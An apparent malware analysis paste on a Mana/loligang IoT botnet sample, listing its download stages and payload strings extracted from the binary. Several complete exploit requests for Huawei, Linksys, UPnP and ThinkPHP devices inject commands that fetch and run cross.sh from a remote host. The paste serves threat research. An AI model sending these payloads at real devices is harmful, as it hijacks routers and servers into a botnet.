ankit_anubhav

MANA Botnet using 2 HFS

May 27th, 2019
  1. Stage 1 http://download.nadns.info/cross.sh
  2. Stage 2 22.186.15.231:5555/loligang.x86
  3.  
  4. Usual Mana botnet attack vectors: DEADBEEF encryption key (stored little-endian, visible as `ef be ad de` in the dump below). Brute-force attack strings are XORed with it; exploit attack strings are in plaintext.
  5.  
  6. 0x805a030: 80 4f 05 08 ef be ad de 00 00 00 00 00 00 00 00 |.O..............|
  7.  
  8. 0x804e7d4: 68 18 7d 05 08 push 0x8057d18 ; "GET /login.cgi?cli=aa%20aa%27;wget%20http://download.nadns.info/cross.sh%20-O%20-%3E%20/tmp/cross.sh;sh%20/tmp/cross.sh%27$ HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\n\r\n"
  9.  
  10. 0x804f304: 68 00 7e 05 08 push 0x8057e00 ; "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g IP -l /tmp/kalon -r /bins/kalon.mips; /bin/busybox chmod 777 /tmp/kalon; /tmp/kalon huawei; /bin/busybox iptables -A INPUT -p tcp --destination-port 37215 -j DROP)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\r\n\r\n"
  11.  
  12. 0x8051724: 68 84 81 05 08 push 0x8058184 ; "POST /tmUnblock.cgi HTTP/1.1\r\nHost: 192.168.0.14:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.20.0\r\nContent-Length: 227\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nttcp_ip=-h+%60cd+%2ftmp%3b+rm+-rf+cross.sh%3b+wget+http%3a%2f%2fdownload.nadns.info%2fcross.sh%3b+chmod+777+cross.sh%3b+.%2fcross.sh+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1"
  13.  
  14. 0x8052be4: 68 50 83 05 08 push 0x8058350 ; "POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`wget http://download.nadns.info/cross.sh -O /tmp/cross.sh;sh /tmp/cross.sh`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n"
  15.  
  16. 0x805908f: 12 0c 11 10 12 10 0c 1b 16 22 00 00 00 47 45 54 |........."...GET|
  17. 0x805909f: 20 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 | /index.php?s=/i|
  18. 0x80590af: 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e |ndex/.hink.pp/in|
  19. 0x80590bf: 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e |vokefunction&fun|
  20. 0x80590cf: 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f |ction=call_user_|
  21. 0x80590df: 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b |func_array&vars[|
  22. 0x80590ef: 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 |0]=shell_exec&va|
  23. 0x80590ff: 72 73 5b 31 5d 5b 5d 3d 20 27 77 67 65 74 20 68 |rs[1][]= 'wget h|
  24. 0x805910f: 74 74 70 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6e |ttp://download.n|
  25. 0x805911f: 61 64 6e 73 2e 69 6e 66 6f 2f 63 72 6f 73 73 2e |adns.info/cross.|
  26. 0x805912f: 73 68 20 2d 4f 20 2f 74 6d 70 2f 63 72 6f 73 73 |sh -O /tmp/cross|
  27. 0x805913f: 2e 73 68 3b 20 63 68 6d 6f 64 20 37 37 37 20 2f |.sh; chmod 777 /|
  28. 0x805914f: 74 6d 70 2f 63 72 6f 73 73 2e 73 68 3b 20 2f 74 |tmp/cross.sh; /t|
  29. 0x805915f: 6d 70 2f 63 72 6f 73 73 2e 73 68 27 20 48 54 54 |mp/cross.sh' HTT|
  30. 0x805916f: 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f |P/1.1..Connectio|
  31. 0x805917f: 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 41 |n: keep-alive..A|
  32. 0x805918f: 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 |ccept-Encoding: |
  33. 0x805919f: 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 0d 0a 41 |gzip, deflate..A|
  34. 0x80591af: 63 63 65 70 74 3a 20 2f 0d 0a 55 73 65 72 2d 41 |ccept: /..User-A|
  35. 0x80591bf: 67 65 6e 74 3a 20 6c 6f 6c 69 67 61 6e 67 2f 32 |gent: loligang/2|